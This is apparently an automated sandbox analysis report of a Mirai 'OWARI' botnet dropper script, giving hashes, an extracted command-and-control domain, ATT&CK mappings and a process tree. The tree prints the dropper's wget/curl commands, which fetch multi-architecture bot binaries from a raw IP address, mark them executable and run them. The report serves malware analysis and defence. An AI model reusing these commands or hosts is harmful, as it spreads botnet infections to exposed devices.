mirai | 5d8f0d7fc44dcd6e2488c1e37d9e31be38e558963a7b4531806c8c7d7004cdaa

Analysis

max time kernel
13s
max time network
29s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
10-10-2024 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

2KB
MD5

31eb41cbfbbd0e48aecbe2a689a34d71
SHA1

a315bbb1681b97a156f747d3ab9f6d0f5694c475
SHA256

5d8f0d7fc44dcd6e2488c1e37d9e31be38e558963a7b4531806c8c7d7004cdaa
SHA512

50d60c823a9f5d88b21a7b7a5f3261c77ef635af545d0464c1114af51caa2b52f8a5764cfdcbd6587f84daa05db18f15132f61e7d384192fe1c8b18eab9d4ef4

Score

10^/10

mirai owari antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

OWARI

milnetbrasil.duckdns.org

Extracted

Family

mirai

Botnet

OWARI

milnetbrasil.duckdns.org

Extracted

Family

mirai

Botnet

OWARI

milnetbrasil.duckdns.org

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
690	chmod
722	chmod
741	chmod
752	chmod
765	chmod
670	chmod
678	chmod
704	chmod
783	chmod
799	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/payload	671	payload
/tmp/payload	679	payload
/tmp/payload	691	payload
/tmp/payload	706	payload
/tmp/payload	724	payload
/tmp/payload	743	payload
/tmp/payload	753	payload
/tmp/payload	766	payload
/tmp/payload	784	payload
/tmp/payload	800	payload

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	414uu11140u8x428111	753	payload

Checks CPU configuration 1 TTPs 10 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
673	wget
676	curl
677	cat

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/nuklear.m68k	curl
File opened for modification	/tmp/nuklear.mips	wget
File opened for modification	/tmp/nuklear.mips	curl
File opened for modification	/tmp/nuklear.arm4	curl
File opened for modification	/tmp/nuklear.arm5	wget
File opened for modification	/tmp/nuklear.arm6	curl
File opened for modification	/tmp/nuklear.x86	wget
File opened for modification	/tmp/nuklear.mpsl	wget
File opened for modification	/tmp/nuklear.arm6	wget
File opened for modification	/tmp/nuklear.arm7	wget
File opened for modification	/tmp/nuklear.ppc	wget
File opened for modification	/tmp/nuklear.sh4	curl
File opened for modification	/tmp/nuklear.x86	curl
File opened for modification	/tmp/nuklear.arm5	curl
File opened for modification	/tmp/nuklear.ppc	curl
File opened for modification	/tmp/nuklear.m68k	wget
File opened for modification	/tmp/nuklear.sh4	wget
File opened for modification	/tmp/payload	na.sh
File opened for modification	/tmp/nuklear.mpsl	curl
File opened for modification	/tmp/nuklear.arm7	curl

/tmp/na.sh
/tmp/na.sh
1⤵
- Writes file to tmp directory
PID:641
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.x86
  2⤵
  - Writes file to tmp directory
  PID:644
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:660
- /bin/cat
  cat nuklear.x86
  2⤵
  PID:668
- /bin/chmod
  chmod +x na.sh nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:670
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:671
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:673
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:676
- /bin/cat
  cat nuklear.mips
  2⤵
  - System Network Configuration Discovery
  PID:677
- /bin/chmod
  chmod +x na.sh nuklear.mips nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:679
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.mpsl
  2⤵
  - Writes file to tmp directory
  PID:681
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:682
- /bin/cat
  cat nuklear.mpsl
  2⤵
  PID:689
- /bin/chmod
  chmod +x na.sh nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:691
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.arm4
  2⤵
  PID:694
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:698
- /bin/cat
  cat nuklear.arm4
  2⤵
  PID:703
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:706
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.arm5
  2⤵
  - Writes file to tmp directory
  PID:707
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:713
- /bin/cat
  cat nuklear.arm5
  2⤵
  PID:720
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:722
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:724
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.arm6
  2⤵
  - Writes file to tmp directory
  PID:725
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:731
- /bin/cat
  cat nuklear.arm6
  2⤵
  PID:740
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:743
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.arm7
  2⤵
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/cat
  cat nuklear.arm7
  2⤵
  PID:751
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  - Changes its process name
  PID:753
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.ppc
  2⤵
  - Writes file to tmp directory
  PID:754
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/cat
  cat nuklear.ppc
  2⤵
  PID:764
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.mips nuklear.mpsl nuklear.ppc nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:766
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.m68k
  2⤵
  - Writes file to tmp directory
  PID:768
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:775
- /bin/cat
  cat nuklear.m68k
  2⤵
  PID:782
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.ppc nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:784
- /usr/bin/wget
  wget http://81.161.238.213/389242390482/nuklear.sh4
  2⤵
  - Writes file to tmp directory
  PID:787
- /usr/bin/curl
  curl -O http://81.161.238.213/389242390482/nuklear.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:792
- /bin/cat
  cat nuklear.sh4
  2⤵
  PID:798
- /bin/chmod
  chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.ppc nuklear.sh4 nuklear.x86 payload systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-47TRgX
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/payload
  ./payload payload
  2⤵
  - Executes dropped EXE
  PID:800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/nuklear.x86

Filesize
48KB

MD5
0f8078b069cb47510559b035bd452768

SHA1
7f035898a85f0bd74bae61e5e7f88f3d7f91a625

SHA256
f5544913e371f3f4b59591c735aabecf555877932afa77a9cb19fa3185f3c0e3

SHA512
2ff5c2199e690869f6a56468ba56adc0d6d949bd77f01ad4e5030f6d2b2d14a9f916c82e290f24c6c778d8f2e7bbd9563d2228a038efda536425eb1710a93c87

Download Submit
/tmp/payload

Filesize
66KB

MD5
f40f75ef70fe1828f474e793ee1b65b8

SHA1
19d54dfdb398bccb76847fbe807c0f4017f8c75a

SHA256
fecae0a43b30d8196123cc4e148a5ecfce6ae06548c0d7b081c4ebbdcb9a93dc

SHA512
4ed084ee10ddad9085dc5dfd50573dafdae4f61048e3c7a1395328b13cf65a90199ddfab661ef4161d68bc34f34e45ca3d1744c0bcb89e23173a1a6ef2f4750f

Download Submit
/tmp/payload

Filesize
69KB

MD5
f425fff657e00dafd95e0555a67cfaa5

SHA1
077fb30cacdb8bd7860b0feac5cf3240593a0770

SHA256
bb463c4a9d2b8cb78017bfa881021a873265546a833eb995491a02feda91ecf3

SHA512
ae12fc824408615d900cb32beedcabf00193b6d30002da14c50c231ff0cd6273866dccfa0b29a249cc28f8699f29cf555abcfb4b3de6626bac0aa3b7f2b7b3ec

Download Submit
/tmp/payload

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
/tmp/payload

Filesize
47KB

MD5
b736e077f2f4045161ecc4fdcd33e096

SHA1
e5317cf6dd38be71de9bc39b915f68885c9438cc

SHA256
ee0c1919a52db4ffd6f523d990581e6e9c8a6e4c27bf6daa6bb14502c13e767f

SHA512
83a74fd29a53404abc2a063ff013133ac866161add085278467bf28a9a522a1d132532081eadb44b6d6351a351f534b3c5ef2e0577acd0d510da08ad6dc58179

Download Submit
/tmp/payload

Filesize
123KB

MD5
dbae34e09be6b63656384288716ed5f3

SHA1
ee6c25af23b6d0f42245cb1765fe7a95da6e8b5b

SHA256
7d6334fc6d0ebaaee7c320216ff22d0c96fea563e4830578ab0f57c0c700af00

SHA512
d69c8bb27bc63e0913f43b5c1f3cbb4d98230c0829fa34e6d8805b614c79171ddd8445c6aa14385e3f5cac4f3a4996a2345bae6bd1ad5e1c6e20ae74da720ad3

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads